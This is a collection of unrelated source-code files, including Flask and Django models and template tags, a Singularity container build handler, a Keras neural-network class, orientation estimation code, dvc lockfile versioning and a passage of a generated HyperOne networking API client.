self.last_seen = datetime.utcnow()
db.session.add(self)
def get_jwt(self, expire_in=600):
now = datetime.utcnow()
payload = {
'user_id': self.id,
'name': self.name if self.name else self.username,
'exp': now + timedelta(seconds=expire_in),
'iat': now
}
return jwt.encode(
payload,
current_app.config['SECRET_KEY'],
algorithm='HS256').decode('utf-8')
@staticmethod
def verify_jwt(token):
try:
payload = jwt.decode(
token,
current_app.config['SECRET_KEY'],
algorithms=['HS256'])
except jwt.exceptions.ExpiredSignatureError as e:
return None
return User.query.get(payload.get('user_id'))
"""
def revoke_token(self):
self.token_expiration = datetime.utcnow() - timedelta(seconds=1)
@staticmethod
def check_token(token):
user = User.query.filter_by(token=token).first()
if user is None or user.token_expiration < datetime.utcnow():
return None
return user
"""
class Post(PaginatedAPIMixin, db.Model):
__tablename__ = 'posts'
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(255))
summary = db.Column(db.Text)
body = db.Column(db.Text)
timestamp = db.Column(db.DateTime, index=True, default=datetime.utcnow)
views = db.Column(db.Integer, default=0)
    # Foreign key: the id of the post's author
author_id = db.Column(db.Integer, db.ForeignKey('users.id'))
@staticmethod
    def on_changed_body(target, value, oldvalue, initiator):
        """
        target: the Post instance on which the listened 'set' event fired
        value: the new value assigned to the monitored field
        """
        if not target.summary:  # if the frontend leaves the summary empty it is an empty str, not None
            target.summary = value[:200]  # use the first 200 characters of the body field as the summary
def to_dict(self):
data = {
'id':self.id,
'title':self.title,
'summary':self.summary,
'body':self.body,
'timestamp':self.timestamp,
'views':self.views,
'author':self.author.to_dict(),
'_links':{
'self': url_for('api.get_post',id=self.id),
'author_url':url_for('api.get_user',id = self.author_id)
}
}
return data
def from_dict(self, data):
for field in ['title', 'summary', 'body', 'timestamp', 'views']:
if field in data:
setattr(self, field, data[field])
def __repr__(self):
return '<Post {}>'.format(self.title)
db.event.listen(Post.body, 'set', Post.on_changed_body)  # run on_changed_body() whenever the body field changes
| 2.21875
| 2
|
cid/__init__.py
|
managedbyq/cid
| 0
|
12775572
|
__version__ = '0.2.2'
default_app_config = 'cid.apps.CidAppConfig'
| 1.125
| 1
|
Python 1/BaskaraMelhorado.py
|
FamousLuisin/Python
| 0
|
12775573
|
<reponame>FamousLuisin/Python
"""Faça um programa que calcule as raizes da equação:
sem raiz: esta equação não possui raízes reais
uma raiz: a raiz desta equação é X ou a raiz dupla desta equação é X
duas raizes: as raízes da equação são X e Y"""
import math
def main():
a = int(input("Digite o valor de a: "))
b = int(input("Digite o valor de b: "))
c = int(input("Digite o valor de c: "))
raiz(a, b, delta(a, b, c))
def delta(a, b, c):
delta = math.pow(b, 2) - 4 * a * c
return delta
def raiz(a, b, delta):
if delta < 0:
print("esta equação não possui raízes reais")
else:
x1 = (-b + math.sqrt(delta)) / (2 * a)
x2 = (-b - math.sqrt(delta)) / (2 * a)
        if delta == 0:
            print("the root of this equation is {}".format(x1))
        else:
            if x1 > x2:
                print("the roots of the equation are {} and {}".format(x2, x1))
            else:
                print("the roots of the equation are {} and {}".format(x1, x2))
main()
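# Worked example (hypothetical input): a=1, b=-3, c=2 gives delta = 9 - 8 = 1,
# so the program reports the two real roots 1.0 and 2.0.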
| 4.0625
| 4
|
kipoi_containers/singularityhandler.py
|
kipoi/kipoi-containers
| 0
|
12775574
|
from dataclasses import dataclass
from pathlib import Path
from typing import Dict, Union, List, Type
import os
from ruamel.yaml.scalarstring import DoubleQuotedScalarString
from kipoi_containers.singularityhelper import (
build_singularity_image,
update_existing_singularity_container,
push_new_singularity_image,
test_singularity_image,
cleanup,
)
from kipoi_containers import zenodoclient
from kipoi_utils.external.torchvision.dataset_utils import check_integrity
@dataclass
class SingularityHandler:
"""This is a dataclass to be instantiated in order to update and
adding singularity images"""
model_group: str
docker_image_name: str
model_group_to_singularity_dict: Dict
workflow_release_data: Dict
singularity_image_folder: Union[str, Path] = None
zenodo_client: zenodoclient.Client = zenodoclient.Client()
def __post_init__(self):
"""If a location has not been specified for saving the downloaded
singularity containers to, a value is populated from
SINGULARITY_PULL_FOLDER environment variable. If there is no
such variable, the current directory is served as default."""
if self.singularity_image_folder is None:
self.singularity_image_folder = os.environ.get(
"SINGULARITY_PULL_FOLDER", Path(__file__).parent.resolve()
)
def update_container_info(self, updated_singularity_dict: Dict) -> None:
"""Update url, md5 and name keys of the model group's singularity
        container dict with the corresponding values from updated_singularity_dict"""
self.model_group_to_singularity_dict[self.model_group] = {
k: v
for k, v in updated_singularity_dict.items()
if k in ["url", "name", "md5"]
}
def update_release_workflow(self) -> None:
"""Update .github/workflows/release-workflow.yml with the newly
added model group if it is not using one of the shared environments"""
if "shared" not in self.singularity_image_name:
self.workflow_release_data["jobs"]["buildtestandpushsingularity"][
"strategy"
]["matrix"]["image"].append(
DoubleQuotedScalarString(
self.docker_image_name.split(":")[1].replace("-slim", "")
)
)
def add(
self,
models_to_test: List,
docker_to_model_dict: Dict = {},
push: bool = True,
) -> None:
"""Adds a new singularity image. The steps are as follows -
1. First, the new image is built and saved in
singularity_image_folder from the docker image
2. This new singularity image is tested with the models in
<models_to_test>
3. If everything is fine, push the image to zenodo and return
the modified url, name and md5 as a dict
4. Update <model_group_to_singularity_dict> with the new model
        group as key and the dictionary with url, name and md5 as values"""
if "shared" in self.docker_image_name:
self.singularity_image_name = (
f"kipoi-docker_{self.docker_image_name.split(':')[1]}.sif"
)
else:
self.singularity_image_name = (
f"kipoi-docker_{self.model_group.lower()}-slim.sif"
)
self.singularity_dict = {
"url": "",
"name": self.singularity_image_name.replace(".sif", ""),
"md5": "",
}
build_singularity_image(
name_of_docker_image=self.docker_image_name,
singularity_image_name=self.singularity_image_name,
singularity_image_folder=self.singularity_image_folder,
)
for model in models_to_test:
test_singularity_image(
singularity_image_folder=self.singularity_image_folder,
singularity_image_name=self.singularity_image_name,
model=model,
)
if "shared" not in self.docker_image_name:
new_singularity_dict = push_new_singularity_image(
zenodo_client=self.zenodo_client,
singularity_image_folder=self.singularity_image_folder,
singularity_dict=self.singularity_dict,
model_group=self.model_group,
push=push,
)
else:
example_model = docker_to_model_dict[
self.docker_image_name.replace("-slim", "")
][0]
new_singularity_dict = self.model_group_to_singularity_dict[
example_model.split("/")[0]
]
self.update_container_info(new_singularity_dict)
self.update_release_workflow()
def update(self, models_to_test: List, push: bool = True) -> None:
"""Updates an existing singularity image. The steps are as follows -
1. First, a singularity image is built and saved in
singularity_image_folder from the docker image
2. A checksum is computed and compared against the existing md5 key
3. If the new image is identical to the existing one,
a cleanup is performed followed by an exit.
2. Otherwise, This new singularity image is tested with the models in
<models_to_test>
3. If everything is fine, push the new image to zenodo as a new version
and return the modified url, name and md5 as a dict
4. Update <model_group_to_singularity_dict> with the new model
group as key and the dictionary with url, md5, key as values"""
self.singularity_dict = self.model_group_to_singularity_dict[
self.model_group
]
self.singularity_image_name = f'{self.singularity_dict["name"]}.sif'
singularity_image_path = build_singularity_image(
name_of_docker_image=self.docker_image_name,
singularity_image_name=self.singularity_image_name,
singularity_image_folder=self.singularity_image_folder,
)
checksum_match = check_integrity(
singularity_image_path, self.singularity_dict["md5"]
)
if checksum_match:
print(
f"No need to update the existing singularity container for {self.model_group}"
)
cleanup(singularity_image_path)
else:
for model in models_to_test:
test_singularity_image(
singularity_image_folder=self.singularity_image_folder,
singularity_image_name=self.singularity_image_name,
model=model,
)
updated_singularity_dict = update_existing_singularity_container(
zenodo_client=self.zenodo_client,
singularity_dict=self.singularity_dict,
singularity_image_folder=self.singularity_image_folder,
model_group=self.model_group,
push=push,
)
cleanup(singularity_image_path)
self.update_container_info(updated_singularity_dict)
| 2.28125
| 2
|
test/scloud/test_provisioner.py
|
harsimranmaan/splunk-cloud-sdk-go
| 0
|
12775575
|
import unittest
import test
def provisioner(*args):
return test.scloud("provisioner", *args)
class TestProvisioner(unittest.TestCase):
def setUp(self):
# retrieve the selected tenant name
code, self.tname, _ = test.scloud("get", "tenant")
self.assertEqual(0, code)
self.assertIsNotNone(self.tname)
def test_tenants(self):
code, tenants, _ = provisioner("list-tenants")
self.assertEqual(0, code)
self.assertTrue(any(t["name"] == self.tname for t in tenants))
code, tenant, _ = provisioner("get-tenant", self.tname)
self.assertEqual(0, code)
self.assertEqual(self.tname, tenant["name"])
self.assertTrue("createdAt" in tenant)
self.assertTrue("createdBy" in tenant)
if __name__ == "__main__":
unittest.main()
| 2.96875
| 3
|
familysearch/discovery.py
|
teoliphant/familysearch-python-sdk-opensource
| 1
|
12775576
|
# -*- coding: utf-8 -*-
"""FamilySearch Discovery submodule"""
# Python imports
# Magic
class Discovery(object):
"""https://familysearch.org/developers/docs/api/tree/FamilySearch_Collections_resource"""
def __init__(self):
"""https://familysearch.org/developers/docs/api/resources#discovery"""
# TODO: Set it up so that it doesn't need to call the submodules
# until absolutely necessary...
self.root_collection = self.get(self.base + '/.well-known/collection')
self.subcollections = self.get(self.root_collection['response']
['collections'][0]['links']
['subcollections']['href'])
self.collections = {}
self.fix_discovery()
def update_collection(self, collection):
response = self.get(self.collections[collection]['url'])['response']
self.collections[collection]['response'] = response
def fix_discovery(self):
"""The Hypermedia items are semi-permanent. Some things change
based on who's logged in (or out).
"""
for item in self.subcollections['response']['collections']:
self.collections[item['id']] = {}
self.collections[item['id']]['url'] = item['links']['self']['href']
if item['id'] == 'LDSO':
try:
self.update_collection("LDSO")
except KeyError:
self.lds_user = False
else:
self.lds_user = True
try:
self.user = self.get_current_user()['response']['users'][0]
        except Exception:
self.user = ""
| 2.515625
| 3
|
cruds/templatetags/crud_tags.py
|
poiedk/django-cruds
| 43
|
12775577
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os.path
from django.utils import six
from django.db import models
from django import template
from django.urls import (
NoReverseMatch,
reverse,
)
from django.utils.html import escape
from django.utils.safestring import mark_safe
from cruds import utils
register = template.Library()
@register.filter
def get_attr(obj, attr):
"""
Filter returns obj attribute.
"""
return getattr(obj, attr)
@register.simple_tag
def crud_url(obj, action):
try:
url = reverse(
utils.crud_url_name(type(obj), action),
kwargs={'pk': obj.pk})
except NoReverseMatch:
url = None
return url
def format_value_instance(value):
url = crud_url(value, utils.ACTION_DETAIL)
if url:
return mark_safe('<a href="%s">%s</a>' % (url, escape(value)))
if hasattr(value, 'get_absolute_url'):
url = getattr(value, 'get_absolute_url')()
return mark_safe('<a href="%s">%s</a>' % (url, escape(value)))
return value
@register.filter
def format_value(obj, field_name):
"""
Simple value formatting.
If value is model instance returns link to detail view if exists.
"""
display_func = getattr(obj, 'get_%s_display' % field_name, None)
if display_func:
return display_func()
value = getattr(obj, field_name)
if isinstance(value, models.fields.files.FieldFile):
if value:
return mark_safe('<a href="%s">%s</a>' % (
value.url,
os.path.basename(value.name),
))
else:
return ''
if isinstance(value, models.Model):
return format_value_instance(value)
if isinstance(value, models.Manager):
return mark_safe(', '.join(
[format_value_instance(instance) for instance in value.all()]
))
if value is None:
value = ""
return value
@register.inclusion_tag('cruds/templatetags/crud_fields.html')
def crud_fields(obj, fields=None):
"""
Display object fields in table rows::
<table>
        {% crud_fields object 'id, name' %}
</table>
* ``fields`` fields to include
If fields is ``None`` all fields will be displayed.
If fields is ``string`` comma separated field names will be
displayed.
if field is dictionary, key should be field name and value
field verbose name.
"""
if fields is None:
fields = utils.get_fields(type(obj))
elif isinstance(fields, six.string_types):
field_names = [f.strip() for f in fields.split(',')]
fields = utils.get_fields(type(obj), include=field_names)
return {
'object': obj,
'fields': fields,
}
@register.simple_tag
def get_fields(model, fields=None):
"""
Assigns fields for model.
"""
include = [f.strip() for f in fields.split(',')] if fields else None
return utils.get_fields(
model,
include
)
| 2.140625
| 2
|
python/Intro/modules/test3.py
|
Joaxin/GitComments
| 0
|
12775578
|
from module3 import *
print(generate_code(10))
| 1.101563
| 1
|
kinemparse/kinematics.py
|
jd-jones/kinemparse
| 0
|
12775579
|
<gh_stars>0
import numpy as np
from blocks.core import geometry
def updateCovariance(R_new, P, gyro_cov, sample_period, sqrt_mode=False):
""" NOTE: if sqrt_mode, then P and gyro_cov are assumed to be the
square roots of these respective matrices.
"""
G = sample_period * R_new
    if sqrt_mode:
        # TODO: the square-root covariance update is not implemented yet; fail
        # loudly instead of falling through with P_new undefined.
        raise NotImplementedError("sqrt_mode covariance update is not implemented")
    else:
        P_new = P + G @ gyro_cov @ G.T
    return P_new
def updateOrientation(omega, R, sample_period):
R_new = geometry.exponentialMap(sample_period * omega) @ R
return R_new
def timeUpdate(omega, gyro_cov, R, P, sample_period, sqrt_mode=False):
R_new = updateOrientation(omega, R, sample_period)
P_new = updateCovariance(
R_new, P, gyro_cov, sample_period,
sqrt_mode=sqrt_mode
)
return R_new, P_new
def updatePosition(a, a_prev, a_cov, v, x, R, P, T, stationary_thresh=0.005):
""" State-space update to velocity and position estimates.
a: accel, t
v: velocity, t - 1
x: position, t - 1
R: orientation, t
T: sample period
"""
delta_a = a - a_prev
is_stationary = np.linalg.norm(delta_a) < stationary_thresh
if is_stationary:
v_new = np.zeros(3)
x_new = x
else:
a_compensated = R @ a - gravityVec()
v_new = v + T * a_compensated
x_new = x + T * v + 0.5 * T ** 2 * a_compensated
return v_new, x_new
def gravityVec():
g = np.zeros(3)
g[2] = 1
return g
def measurementUpdate(a, accel_cov, R, P, sqrt_mode=False):
g = gravityVec()
a_est = - R @ g
G = geometry.skewSymmetricMatrix(g)
H = - R @ G
# NOTE: H is always rank-deficient because the gravity vector only has one
# nonzero entry. This means the skew-symmetric matrix G will have one
# row and one column which are all zero.
# FIXME: Construct S, S_inv from matrix square root of P
if sqrt_mode:
pass
S = H @ P @ H.T
# pinv is a hack. S is singular because of the issue with H above.
S_inv = np.linalg.pinv(S)
K = P @ H.T @ S_inv
deviation_angle = K @ (a - a_est)
R_new = geometry.exponentialMap(deviation_angle) @ R
P_new = P - K @ S @ K.T
return R_new, P_new, deviation_angle
def matrixSquareRoot(psd_matrix):
# FIXME: This doesn't need to exist. Just compute the Cholesky factorization.
w, v = np.linalg.eigh(psd_matrix)
w_sqrt = np.sqrt(w)
# A = X @ X.T
# = V @ W @ V.T
# Therefore,
# X = V @ sqrt(W)
return v @ np.diag(w_sqrt)
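# Quick sanity check for matrixSquareRoot (illustrative only): for a symmetric
# positive semi-definite P, the returned X satisfies X @ X.T == P.
#
#     P = np.array([[4.0, 1.0], [1.0, 3.0]])
#     X = matrixSquareRoot(P)
#     assert np.allclose(X @ X.T, P)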
def estimateOrientation(
angular_velocities, linear_accels=None,
gyro_cov=None, accel_cov=None,
init_orientation=None, init_cov=None,
init_velocity=None, init_position=None,
sample_period=0.02, sqrt_mode=False):
""" Estimate the orientation using a linear approximation (EKF). """
if init_orientation is None:
init_angle = np.zeros(3)
init_orientation = np.eye(3)
if init_cov is None:
init_cov = np.eye(3)
if gyro_cov is None:
gyro_cov = np.eye(3)
if accel_cov is None:
accel_cov = np.eye(3)
if init_velocity is None:
init_velocity = np.zeros(3)
if init_position is None:
init_position = np.zeros(3)
orientations = [] # [init_orientation.copy()]
covariances = [] # [gyro_cov.copy()]
angles = [] # [init_angle.copy()]
velocities = []
positions = []
if sqrt_mode:
gyro_cov = matrixSquareRoot(gyro_cov)
accel_cov = matrixSquareRoot(accel_cov)
R = init_orientation.copy()
P = init_cov.copy()
angle = init_angle.copy()
v = init_velocity.copy()
x = init_position.copy()
# omega_prev = np.zeros(3)
a_prev = np.zeros(3)
for omega, a in zip(angular_velocities, linear_accels):
R_new, P_new = timeUpdate(omega, gyro_cov, R, P, sample_period, sqrt_mode=sqrt_mode)
angle += omega * sample_period
v_new, x_new = updatePosition(a, a_prev, accel_cov, v, x, R_new, P_new, sample_period)
if linear_accels is not None:
R_new, P_new, deviation_angle = measurementUpdate(
a, accel_cov, R_new, P_new,
sqrt_mode=sqrt_mode
)
angle += deviation_angle
R = R_new.copy()
P = P_new.copy()
v = v_new.copy()
x = x_new.copy()
# omega_prev = omega
a_prev = a
if sqrt_mode:
P_new = P_new @ P_new.T
orientations.append(R_new)
covariances.append(P_new)
angles.append(angle.copy())
velocities.append(v_new)
positions.append(x_new)
angles = np.row_stack(tuple(angles))
velocities = np.row_stack(tuple(velocities))
positions = np.row_stack(tuple(positions))
return orientations, covariances, angles, velocities, positions
def isStationary(gyro_seq, thresh=1.5):
gyro_mag = np.linalg.norm(gyro_seq, axis=1)
return gyro_mag < thresh
def subtractStationaryMean(sample_seq):
is_stationary = isStationary(sample_seq)
stationary_samples = sample_seq[is_stationary, :]
stationary_mean = stationary_samples.mean(axis=0)
return sample_seq - stationary_mean
| 2.46875
| 2
|
tf/parameters.py
|
gitter-badger/text-fabric
| 0
|
12775580
|
<filename>tf/parameters.py
import sys
from zipfile import ZIP_DEFLATED
VERSION = '7.8.12'
NAME = 'Text-Fabric'
PACK_VERSION = '2'
ORG = 'annotation'
REPO = 'text-fabric'
URL_GH_API = 'https://api.github.com/repos'
URL_GH = 'https://github.com'
URL_NB = 'https://nbviewer.jupyter.org/github'
DOWNLOADS = '~/Downloads'
GH_BASE = '~/github'
EXPRESS_BASE = '~/text-fabric-data'
EXPRESS_SYNC = '__checkout__.txt'
EXPRESS_SYNC_LEGACY = [
'__release.txt',
'__commit.txt',
]
URL_TFDOC = f'https://{ORG}.github.io/{REPO}'
DOI_TEXT = '10.5281/zenodo.592193'
DOI_URL = 'https://doi.org/10.5281/zenodo.592193'
APIREF = f'https://{ORG}.github.io/{REPO}/Api/Fabric/'
APP_URL = f'{URL_GH}/{ORG}'
APP_NB_URL = f'{URL_NB}/{ORG}/tutorials/blob/master'
APP_GITHUB = f'{GH_BASE}/annotation'
APP_CODE = 'code'
TEMP_DIR = '_temp'
LOCATIONS = [
'~/Downloads/text-fabric-data',
'~/text-fabric-data',
'~/github/text-fabric-data',
'~/Dropbox/text-fabric-data',
'/mnt/shared/text-fabric-data',
]
GZIP_LEVEL = 2
PICKLE_PROTOCOL = 4
ZIP_OPTIONS = dict(
compression=ZIP_DEFLATED,
)
if sys.version_info[1] >= 7:
ZIP_OPTIONS['compresslevel'] = 6
YARN_RATIO = 1.25
TRY_LIMIT_FROM = 40
TRY_LIMIT_TO = 40
| 1.828125
| 2
|
config/overviewer/manualpois.py
|
randomhost/overviewer-config
| 2
|
12775581
|
<gh_stars>1-10
# vim: set expandtab tabstop=4 shiftwidth=4 softtabstop=4 filetype=python:
####################################################################################################
# Dependencies
####################################################################################################
global json
global os
import json
import logging
import os
####################################################################################################
# Points of Interest
####################################################################################################
manualpois = []
poiDirPath = '/home/minecraft/config/overviewer/poi/'
logging.info('Loading POIs from \'%s\'', poiDirPath)
if os.path.isdir(poiDirPath):
for file in os.listdir(poiDirPath):
poiFilePath=os.path.join(poiDirPath, file)
if os.path.isfile(poiFilePath):
with open(poiFilePath, 'r') as poiFile:
poiData = json.load(poiFile)
poiId = os.path.splitext(file)[0].capitalize()
for poi in poiData:
poi['id'] = poiId
manualpois.append(poi)
else:
logging.warning('Failed to load POI data from \'%s\'', poiDirPath)
| 1.796875
| 2
|
app/behaviors/mail_behavior.py
|
Joeper214/mailingapp
| 0
|
12775582
|
from ferris.core.ndb import Behavior
from app.behaviors.sanitize import Sanitize
class MailBehavior(Behavior):
sanitizer = Sanitize()
def before_put(self, instance):
instance.sender = self.sanitizer.sanitize_email(instance.sender)
instance.recipient = self.sanitizer.sanitize_email(instance.recipient)
instance.subject = self.sanitizer.sanitize_text(instance.subject)
instance.message = self.sanitizer.sanitize_text(instance.message)
| 2.53125
| 3
|
tag/Brain.py
|
AymericBasset/Reinforcment_Learning_Tag
| 0
|
12775583
|
import numpy as np
import random as rd
import tensorflow as tf
from tensorflow import keras
class Brain():
    def __init__(self, brain_spec, random=True, weights=None):
        self.brain_spec = brain_spec
        ## INIT
        # This is a new brain
self.neurones = keras.Sequential()
for i in range(len(brain_spec)-2):
#init the weights between two layers, with matrix [layer_i,layer_i+1] and the bias
self.neurones.add(keras.layers.Dense(brain_spec[i+1],activation= "elu",input_shape=(brain_spec[i],)))
#output layer
self.neurones.add(keras.layers.Dense(brain_spec[-1], activation="softmax"))
        # In case specific weights are wanted
        if not random:
            assert weights is not None
            self.neurones.set_weights(weights)
#self.brain.compile(optimizer="adam", loss =t.tanh_custom_loss,metrics=[t.tanh_custom_loss])
self.optimizer = keras.optimizers.Adam(learning_rate=0.01)
def think(self, x):
return(self.neurones(np.expand_dims(x,axis=0))).numpy()[0]
def mutate(self,mutation_factor = 0.1):
weights = self.neurones.get_weights()
for layer in weights:
layer += layer*rd.uniform(-1*mutation_factor,1*mutation_factor)*np.random.randint(2,size=layer.shape)
self.neurones.set_weights(weights)
def expand(self):
pass
def learn(self,memory):
pass
if __name__ == "__main__":
TEST = True
if TEST:
test_input = np.array([1,1,1,1])
output_size = 4
brain_spec = [test_input.shape[0],5,output_size]
print("#################### RANDOM INIT ######################################")
head = Brain(brain_spec,random = True)
print(head.neurones.get_weights())
print("#################### DEFINE INIT ######################################")
head = Brain(brain_spec,random = False, weights=head.neurones.get_weights())
print(head.neurones.get_weights())
print(head.neurones.summary())
print("#################### MUTATING ###########################################")
head.mutate()
print(head.neurones.get_weights())
##THINK
print("#################### THINKING ############################################")
print(head.think(test_input))
##LEARN
print(head.neurones.trainable_variables)
print("#################### LEARNING ############################################")
memory = [np.array([[1.0,1.0,10.0,10.0]]),np.array([2.0])]
head.learn(memory)
| 2.796875
| 3
|
middleman/exceptions.py
|
lucasrafaldini/proxy
| 2
|
12775584
|
<reponame>lucasrafaldini/proxy
class ServerNotRespondingException(BaseException):
"""
Exception raised when the requested server is not responding.
"""
def __init__(self, url):
self.url = url
def __str__(self):
return "Url '%s' is not responding." % self.url
class ExceededRequestsLimitException(BaseException):
"""
Exception raised when the number of requests has exceeded the
allowed limit.
"""
def __init__(self, ip, url):
self.ip = ip
self.url = url
def __str__(self):
return "Address {} has exceeded the allowed requests limit for path {}".format(
self.ip, self.path
)
class AccessNotRegisteredException(BaseException):
"""
Exception raised when the request is not registered.
"""
def __init__(self, key, ip, path):
self.key = key
self.ip = ip
self.path = path
def __str__(self):
return "Request from {} could not be registered for path {} - Key: {}".format(
self.ip, self.path, self.key
)
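# Illustrative usage (hypothetical URL): these exceptions only carry context for
# their error messages.
#
#     str(ServerNotRespondingException("https://example.com"))
#     # -> "Url 'https://example.com' is not responding."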
| 3.15625
| 3
|
alfi/trainers/trainer.py
|
mrandri19/alfi
| 4
|
12775585
|
import time
from abc import abstractmethod
from typing import List
from alfi.models import LFM
import torch
import numpy as np
import gpytorch
from torch.utils.data.dataloader import DataLoader
from alfi.utilities.torch import is_cuda
from alfi.datasets import LFMDataset
class Trainer:
"""
An abstract LFM trainer. Subclasses must implement the `single_epoch` function.
Parameters
----------
lfm: The Latent Force Model.
optimizers: list of `torch.optim.Optimizer`s. For when natural gradients are used for variational models.
dataset: Dataset where t_observed (D, T), m_observed (J, T).
    give_output: whether the trainer should give the first output (y_0) as initial value to the model `forward()`
track_parameters: the keys into `named_parameters()` of parameters that the trainer should track. The
tracked parameters can be accessed from `parameter_trace`
train_mask: boolean mask
"""
def __init__(self,
lfm: LFM,
optimizers: List[torch.optim.Optimizer],
dataset: LFMDataset,
batch_size=1,
give_output=False,
track_parameters=None,
train_mask=None,
checkpoint_dir=None):
self.lfm = lfm
self.num_epochs = 0
self.optimizers = optimizers
self.use_natural_gradient = len(self.optimizers) > 1
self.batch_size = batch_size
self.data_loader = DataLoader(dataset, batch_size=batch_size, shuffle=False)
self.losses = None
self.give_output = give_output
self.train_mask = train_mask
self.checkpoint_dir = checkpoint_dir
self.parameter_trace = None
if track_parameters is not None:
named_params = dict(lfm.named_parameters())
self.parameter_trace = {key: [named_params[key].detach()] for key in track_parameters}
def train(self, epochs=20, report_interval=1, reporter_callback=None, **kwargs):
"""
Parameters:
reporter_callback: function called every report_interval
"""
self.lfm.train()
losses = list()
times = list()
end_epoch = self.num_epochs+epochs
for epoch in range(epochs):
epoch_loss, split_loss = self.single_epoch(epoch=self.num_epochs, **kwargs)
t = time.time()
times.append((t, epoch_loss))
if (epoch % report_interval) == 0:
if reporter_callback is not None:
reporter_callback(self.num_epochs)
print('Epoch %03d/%03d - Loss: %.2f (' % (
self.num_epochs + 1, end_epoch, epoch_loss), end='')
print(' '.join(map(lambda l: '%.2f' % l, split_loss)), end='')
if isinstance(self.lfm, gpytorch.models.GP):
kernel = self.lfm.covar_module
print(f') λ: {str(kernel.lengthscale.view(-1).detach().numpy())}', end='')
elif hasattr(self.lfm, 'gp_model'):
print(f') kernel: {self.lfm.summarise_gp_hyp()}', end='')
else:
print(')', end='')
self.print_extra()
if self.checkpoint_dir is not None:
self.lfm.save(self.checkpoint_dir / f'epoch{epoch}')
losses.append(split_loss)
self.after_epoch()
self.num_epochs += 1
losses = torch.tensor(losses).cpu().numpy()
if self.losses is None:
self.losses = np.empty((0, losses.shape[1]))
self.losses = np.concatenate([self.losses, losses], axis=0)
return times
@abstractmethod
def single_epoch(self, epoch=0, **kwargs):
raise NotImplementedError
def set_optimizers(self, optimizers):
self.optimizers = optimizers
def print_extra(self):
print('')
def after_epoch(self):
if self.parameter_trace is not None:
params = dict(self.lfm.named_parameters())
for key in params:
if key in self.parameter_trace:
self.parameter_trace[key].append(params[key].detach().clone())
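# Illustrative only (not part of alfi): a minimal subclass sketch showing the
# contract `single_epoch` is expected to fulfil -- return the scalar epoch loss
# plus a per-term loss breakdown, which `train` uses for reporting.
class _ExampleTrainer(Trainer):
    def single_epoch(self, epoch=0, **kwargs):
        epoch_loss = 0.0
        for batch in self.data_loader:
            # compute the batch loss with self.lfm and step self.optimizers here
            pass
        return epoch_loss, [epoch_loss]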
| 2.65625
| 3
|
dvc/parsing/versions.py
|
lucasalavapena/dvc
| 9,136
|
12775586
|
<reponame>lucasalavapena/dvc
import enum
from collections.abc import Mapping
from voluptuous import validators
SCHEMA_KWD = "schema"
META_KWD = "meta"
def lockfile_version_schema(value):
expected = [LOCKFILE_VERSION.V2.value] # pylint: disable=no-member
msg = "invalid schema version {}, expected one of {}".format(
value, expected
)
return validators.Any(*expected, msg=msg)(value)
class VersionEnum(str, enum.Enum):
@classmethod
def all_versions(cls):
return [v.value for v in cls]
class LOCKFILE_VERSION(VersionEnum):
V1 = "1.0"
V2 = "2.0"
@classmethod
def from_dict(cls, data):
        # 1) if it's empty or is not a dict, use the latest one (V2).
        # 2) use the `schema` identifier if it exists and is a supported
        # version
        # 3) if it's not one of the supported versions, use the latest one
        # 4) if there's no identifier, it's a V1
if not data or not isinstance(data, Mapping):
return cls(cls.V2)
version = data.get(SCHEMA_KWD)
if version:
return cls(version if version in cls.all_versions() else cls.V2)
return cls(cls.V1)
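# Illustrative examples of the version-detection rules above (assumed inputs):
#
#     LOCKFILE_VERSION.from_dict({})                 # -> LOCKFILE_VERSION.V2
#     LOCKFILE_VERSION.from_dict({"schema": "2.0"})  # -> LOCKFILE_VERSION.V2
#     LOCKFILE_VERSION.from_dict({"stages": {}})     # -> LOCKFILE_VERSION.V1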
| 2.390625
| 2
|
h1/api/networking_project_netgw_api.py
|
hyperonecom/h1-client-python
| 0
|
12775587
|
<reponame>hyperonecom/h1-client-python
"""
HyperOne
HyperOne API # noqa: E501
The version of the OpenAPI document: 0.1.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from h1.api_client import ApiClient, Endpoint as _Endpoint
from h1.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from h1.model.event import Event
from h1.model.inline_response400 import InlineResponse400
from h1.model.netgw import Netgw
from h1.model.networking_project_netgw_attach import NetworkingProjectNetgwAttach
from h1.model.networking_project_netgw_create import NetworkingProjectNetgwCreate
from h1.model.networking_project_netgw_update import NetworkingProjectNetgwUpdate
from h1.model.resource_service import ResourceService
from h1.model.tag import Tag
from h1.model.tag_array import TagArray
class NetworkingProjectNetgwApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __networking_project_netgw_attach(
self,
project_id,
location_id,
netgw_id,
networking_project_netgw_attach,
**kwargs
):
"""Attach networking/netgw # noqa: E501
action attach # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.networking_project_netgw_attach(project_id, location_id, netgw_id, networking_project_netgw_attach, async_req=True)
>>> result = thread.get()
Args:
project_id (str): Project Id
location_id (str): Location Id
netgw_id (str): Netgw Id
networking_project_netgw_attach (NetworkingProjectNetgwAttach):
Keyword Args:
x_idempotency_key (str): Idempotency key. [optional]
x_dry_run (str): Dry run. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
                    should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
                    should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Netgw
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['project_id'] = \
